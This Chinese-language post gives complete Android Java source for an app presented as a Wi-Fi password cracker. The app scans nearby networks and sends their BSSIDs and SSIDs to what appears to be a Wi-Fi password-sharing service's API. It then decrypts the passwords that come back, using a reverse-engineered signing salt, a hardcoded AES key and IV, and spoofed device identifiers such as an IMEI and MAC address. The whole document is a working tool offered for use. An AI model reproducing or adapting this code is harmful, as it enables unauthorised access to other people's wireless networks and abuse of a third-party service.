SSID是wifi名称 ,密码是wifi密码,(要有网络情况下才能破解)

主要代码:


public class MainActivity extends Activity 

{

Context mContext = this;

TextView textView;

WifiStatus wifiStatus;

Handler mHandler;

final int UPDATE_TEXT = 1;


@Override

protected void onCreate(Bundle savedInstanceState) 

{

super.onCreate(savedInstanceState);

setContentView(R.layout.activity_main);

textView = (TextView) findViewById(R.id.content);

wifiStatus = new WifiStatus(mContext);

mHandler = new Handler() 

{


public void handleMessage(Message msg) {

switch (msg.what) {

case UPDATE_TEXT:

textView.setText(msg.obj.toString());

break;

}

}

};

showWifiStatus();

}


public void btnWifi(View v) 

{

try {

Toast.makeText(mContext, "查询中...", Toast.LENGTH_SHORT).show();

new Thread(new Runnable() {

@Override

public void run() {

try {

Message msg = new Message();

msg.what = UPDATE_TEXT;

msg.obj = new mkQuerypwd().getpwd();

mHandler.sendMessage(msg);

} catch (Exception e) {

e.printStackTrace();

}

}

}).start();

} catch (Exception e) {

e.printStackTrace();

}


}

public void showWifiStatus() {

wifiStatus.scanWifi();

textView.setText("");

}

}





public class WifiStatus {


    WifiManager wifiManager;

    static List wifiList;


    public WifiStatus(Context mContext){

        wifiManager = (WifiManager) mContext.getSystemService(Context.WIFI_SERVICE);

        if(!wifiManager.isWifiEnabled()){

            wifiManager.setWifiEnabled(true);

            Toast.makeText(mContext, "WIFI启动中...", Toast.LENGTH_SHORT).show();

        }

    }


    public void scanWifi(){

        wifiManager.startScan();

        wifiList = wifiManager.getScanResults();

    }

}


public class mkQuerypwd {


    public String getpwd() throws Exception{

        String salt = "LQ9$ne@gH*Jq%KOL";

        Map map = new TreeMap<>();

        map.put("och", "wandoujia");

        map.put("ii", "");

        map.put("appid", "0001");

        map.put("pid", "qryapwd:commonswitch");

        map.put("lang", "cn");

        map.put("v", "58");

        map.put("uhid", "a0000000000000000000000000000001");

        map.put("method", "getDeepSecChkSwitch");

        map.put("st", "m");

        map.put("chanid", "guanwang");

        map.put("sign", "");

        map.put("bssid", "");

        map.put("ssid", "");

        map.put("dhid", this.getdhid());

        map.put("mac", "d8:86:e6:6f:a8:7c");

        StringBuilder bssid = new StringBuilder();

        StringBuilder ssid = new StringBuilder();

        for (ScanResult i : WifiStatus.wifiList){

            bssid.append(i.BSSID).append(",");

            ssid.append(i.SSID).append(",");

        }

        map.put("bssid", bssid.toString());

        map.put("ssid", ssid.toString());

        map.put("sign", getSign(map, salt));


        String response = sendRequest(map);

        JSONObject jsonObject = new JSONObject(response);

        JSONObject psws = jsonObject.getJSONObject("qryapwd").getJSONObject("psws");

        Iterator iterator = psws.keys();

        StringBuilder result = new StringBuilder();

        while (iterator.hasNext()){

            String item = iterator.next();

            String encryptpwd = psws.getJSONObject(item).getString("pwd");

            String decryptpwd = decrypt(encryptpwd);

            int pwdLength = Integer.parseInt(decryptpwd.substring(0, 3));

            String pwd = decryptpwd.substring(3, decryptpwd.length()-1).substring(0, pwdLength);

            String name = psws.getJSONObject(item).getString("ssid");

            result.append("BSSID: ").append(item).append("\nSSID: ").append(name).append("\n密码: ").append(pwd).append("\n\n");

        }

        if (TextUtils.isEmpty(result.toString())){

            return "没找到密码 ˉ\\_(ツ)_/ˉ";

        }

        return result.toString();

    }


    public String getdhid() throws Exception {

        String salt = "LQ9$ne@gH*Jq%KOL";

        Map map = new TreeMap<>();

        map.put("capbssid", "d8:86:e6:6f:a8:7c");

        map.put("model", "Nexus+4");

        map.put("och", "wandoujia");

        map.put("appid", "0001");

        map.put("mac", "d8:86:e6:6f:a8:7c");

        map.put("wkver", "2.9.38");

        map.put("lang", "cn");

        map.put("capbssid", "test");

        map.put("uhid", "");

        map.put("st", "m");

        map.put("chanid", "guanwang");

        map.put("dhid", "");

        map.put("os", "android");

        map.put("scrs", "768");

        map.put("imei", "355136052333516");

        map.put("manuf", "LGE");

        map.put("osvercd", "19");

        map.put("ii", "355136052391516");

        map.put("osver", "5.0.2");

        map.put("pid", "initdev:commonswitch");

        map.put("misc", "google/occam/mako:4.4.4/KTU84P/1227136:user/release-keys");

        map.put("sign", "");

        map.put("v", "58");

        map.put("sim", "");

        map.put("method", "getTouristSwitch");

        map.put("scrl", "1184");

        map.put("sign", getSign(map, salt));


        String dhid;

        String response = sendRequest(map);

        JSONObject jsonObject = new JSONObject(response);

        dhid = jsonObject.getJSONObject("initdev").getString("dhid");

        return dhid;

    }


    public String getSign(Map map, String salt) throws Exception {

        String value = "";

        for (Object o : map.entrySet()) {

            Map.Entry entry = (Map.Entry) o;

            value += entry.getValue();

        }

        value += salt;

        MessageDigest messageDigest = MessageDigest.getInstance("MD5");

        byte[] digest = messageDigest.digest(value.getBytes("UTF-8"));

        BigInteger number = new BigInteger(1, digest);

        String md5 = number.toString(16);

        while (md5.length() < 32) {

            md5 = "0" + md5;

        }

        return md5.toUpperCase();

    }


    public String getRequestData(Map params) throws Exception {

        StringBuilder stringBuilder = new StringBuilder();

        for (Object o : params.entrySet()) {

            Map.Entry entry = (Map.Entry) o;

            stringBuilder.append(entry.getKey()).append("=").append(URLEncoder.encode(entry.getValue(), "UTF-8")).append("&");

        }

        stringBuilder.deleteCharAt(stringBuilder.length() - 1);

        return stringBuilder.toString();

    }


    public String sendRequest(Map params) throws Exception{

        URL url = new URL("http://wifiapi02.51y5.net/wifiapi/fa.cmd");

        HttpURLConnection httpURLConnection = (HttpURLConnection) url.openConnection();

        httpURLConnection.setDoInput(true);

        httpURLConnection.setDoOutput(true);

        httpURLConnection.setRequestMethod("POST");

        httpURLConnection.setUseCaches(false);

        httpURLConnection.setInstanceFollowRedirects(true);

        httpURLConnection.setRequestProperty("Content-type", "application/x-www-form-urlencoded");

        httpURLConnection.setRequestProperty("Host", "wifiapi02.51y5.net");

        httpURLConnection.setRequestProperty("Accept", "text/plain");

        httpURLConnection.connect();


        BufferedWriter bufferedWriter = new BufferedWriter(new OutputStreamWriter(httpURLConnection.getOutputStream()));

        bufferedWriter.write(getRequestData(params));

        bufferedWriter.flush();

        bufferedWriter.close();


        BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(httpURLConnection.getInputStream()));

        StringBuilder response = new StringBuilder();

        String Line;

        while ((Line = bufferedReader.readLine())!=null){

            response.append(Line).append("\n");

        }

        bufferedReader.close();

        httpURLConnection.disconnect();

        return response.toString();

    }


    public String decrypt(String encryptpwd) throws Exception{

        String key = "jh16@`~78vLsvpos";

        String iv = "j#bd0@vp0sj!3jnv";

        SecretKeySpec secretKey = new SecretKeySpec(key.getBytes(), "AES");

        IvParameterSpec ivParameterSpec = new IvParameterSpec(iv.getBytes());

        Cipher cipher = Cipher.getInstance("AES/CBC/NoPadding");

        cipher.init(Cipher.DECRYPT_MODE, secretKey, ivParameterSpec);

        return new String(cipher.doFinal(hex2byte(encryptpwd)));

    }


    public byte[] hex2byte(String hex){

        byte[] output = new byte[hex.length()/2];

        for (int i = 0,j = 0; i < hex.length(); i += 2, j++)

        {

            String str = hex.substring(i, i + 2);

            output[j] = (byte) Integer.parseInt(str, 16);

        }

        return output;

    }


}